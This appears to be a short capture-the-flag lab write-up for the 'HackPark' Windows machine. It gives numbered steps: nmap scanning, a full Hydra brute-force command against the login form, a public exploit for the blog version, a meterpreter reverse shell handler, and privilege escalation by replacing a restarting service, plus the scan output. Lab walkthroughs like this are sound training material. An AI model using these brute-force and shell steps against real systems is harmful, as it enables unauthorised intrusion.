HackPark | Nmap, Gobuster, Burpsuit, Hydra, msfconsole, winPeas

Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!

thingy

  1. nmap -sC -sV -Pn <ip>
    • run default scripts, scan service versions, -Pn because its a known windows machine to skip host discovery
  2. find login page
  3. capture login with burpsuit
  4. bruteforce login with hydra
    • hydra -l admin -P <path to wordlist> <ip> http-post-form "/Account/login.aspx?ReturnURL=/admin:<cookie from burpsuit>"
  5. login with found creds
  6. check version number, 3.3.6.0
  7. find exploit
  8. upload as file and open path
  9. generate reverse shell
  10. upload reverse shell
  11. use msfconsole exploit/multi/handler
  12. set payload to windows/meterpreter/reverse_tcp, set LHOST, set LPORT
  13. run
  14. execute shell
  15. use winpeas or other to enumerate
  16. check running services, find scheduler
  17. check logs for scheduler, find restarting service
  18. replacing restarting service with shell
  19. wait for restarting service and shell
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: HACKPARK
|   NetBIOS_Domain_Name: HACKPARK
|   NetBIOS_Computer_Name: HACKPARK
|   DNS_Domain_Name: hackpark
|   DNS_Computer_Name: hackpark
|   Product_Version: 6.3.9600
|_  System_Time: 2023-11-03T09:11:43+00:00
|_ssl-date: 2023-11-03T09:11:48+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2023-11-02T09:04:30
|_Not valid after:  2024-05-03T09:04:30
MAC Address: 02:62:E7:5C:59:F9 (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=3nfN7%2BF8RCiG99qOq9QkfFo%2BEAVVTYwsRkxx3vxt8ZcM6TyowMKFCrPJ1x7kJpybM5VgxB3hr7D677qRfPLN4C%2BoFuTBrZx1XLCHC6%2Fp%2BB24mae7PI0ErZqHGtBZn7DKVGXZmwzQS6m0OyJMcfU0c3XKRvzETT0iEIVCxy8EMPA4cDjf&__EVENTVALIDATION=jfEDqJnAPOcudO3dt1i7Kc0SN4qt62r0kErQo%2BTl5kMHH%2FXc3SX%2FiNkKilqurJYz8ifG6SM57WKhB2aYog%2BOCHREEaTH38isY0%2FAqTORm3rukdekuueb6rwLtfdifUCoHXLlejjcxioGTy3CZXNqy5rIU%2Bv%2BbHYyxOlCZjOcLd8dm%2FJr&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed"
Last modified 2023.11.03